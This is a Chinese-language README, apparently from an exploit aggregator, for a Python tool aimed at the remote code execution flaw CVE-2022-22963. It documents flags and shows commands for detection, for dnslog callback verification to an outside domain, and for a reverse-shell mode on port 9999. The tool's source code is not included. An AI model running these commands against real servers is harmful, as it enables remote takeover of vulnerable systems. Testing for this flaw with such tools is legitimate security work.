Share
## https://sploitus.com/exploit?id=44AC6EA1-B046-5CD3-8E85-AAF1A5224906
# CVE-2022-22963
### 一、工具描述

可用于检测CVE-2022-22963 代码远程执行漏洞,支持dnslog验证和反弹shell利用



### 二、工具说明

1.使用环境:python3

2.参数说明:

| 参数                                     | 参数说明                                        |
| :--------------------------------------- | ----------------------------------------------- |
| -h,--help                                | 帮助信息                                        |
| -u,--url                                 | 用于检测漏洞的目标URL                           |
| -v,--check                               | 检测是否存在漏洞                                |
| -m {dnslog,shell}, --mode {dnslog,shell} | 两种利用方式,一种为dnslog测试,一种为反弹shell |
| -i,--ip                                 | 用于指定反弹shell的ip地址,与-m参数结合使用     |
| -d,--dns                                 | 用于指定dnslog测试的地址,与-m参数结合使用      |



### 三、工具演示

1、帮助信息说明

python3 CVE-2022-22963.py -h
<img width="765" alt="image" src="https://github.com/xmqaq/CVE-2022-22963/assets/50257557/a8e6b09a-bee2-4f70-9978-aa0d33bdeb4d">


2、漏洞检测

python3 CVE-2022-22963.py -u http://127.0.0.1 -v
<img width="795" alt="image" src="https://github.com/xmqaq/CVE-2022-22963/assets/50257557/d8cf5807-7c5e-405c-9643-570523159761">


3.dnslog验证利用

python3  CVE-2022-22963.py -u http://127.0.0.1:8080 -m dnslog -d xmqaq.p5li4r.dnslog.cn
<img width="1028" alt="image" src="https://github.com/xmqaq/CVE-2022-22963/assets/50257557/2401bacc-d0a4-46e9-a860-a58414d24c26">


<img width="740" alt="image" src="https://github.com/xmqaq/CVE-2022-22963/assets/50257557/a93fc69d-e8e3-4c8d-a10c-d274216370bc">


4.反弹shell利用(默认设置为9999端口)

python  CVE-2022-22963.py -u http://127.0.0.1:8080 -m shell -i 127.0.0.1
<img width="980" alt="image" src="https://github.com/xmqaq/CVE-2022-22963/assets/50257557/b5a1dd93-9940-4742-a174-6df594b3fda6">


<img width="610" alt="image" src="https://github.com/xmqaq/CVE-2022-22963/assets/50257557/e4da3b1b-ceda-4ffa-b0c3-95afeacfa332">